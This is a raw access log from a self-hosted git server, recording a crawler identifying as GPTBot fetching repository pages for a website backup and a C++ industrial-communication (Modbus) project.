303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" -[17/Feb/2026:15:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/.gitignore" -[17/Feb/2026:15:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html" [Client 74.7.227.38] [Length 10018] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" -[17/Feb/2026:15:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components" -[17/Feb/2026:15:58:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/assets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" -[17/Feb/2026:15:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/assets" -[17/Feb/2026:15:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 11324] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 12106] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 11949] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11528] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10191] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10194] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12019] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12707] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12946] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" -[17/Feb/2026:15:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 1354] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" -[17/Feb/2026:15:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" -[17/Feb/2026:15:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" -[17/Feb/2026:15:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10644] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" -[17/Feb/2026:15:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" -[17/Feb/2026:15:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" -[17/Feb/2026:15:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 826] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" -[17/Feb/2026:15:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11444] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" -[17/Feb/2026:15:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9781] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" -[17/Feb/2026:15:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12636] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 10644] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" -[17/Feb/2026:15:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 11270] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" -[17/Feb/2026:15:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" -[17/Feb/2026:15:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 10052] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" -[17/Feb/2026:15:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" -[17/Feb/2026:15:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9785] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" -[17/Feb/2026:15:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 11900] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13643] [Gzip 7.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12946] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12019] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13029] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11172] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13029] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12705] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10194] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 11899] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12020] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12636] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 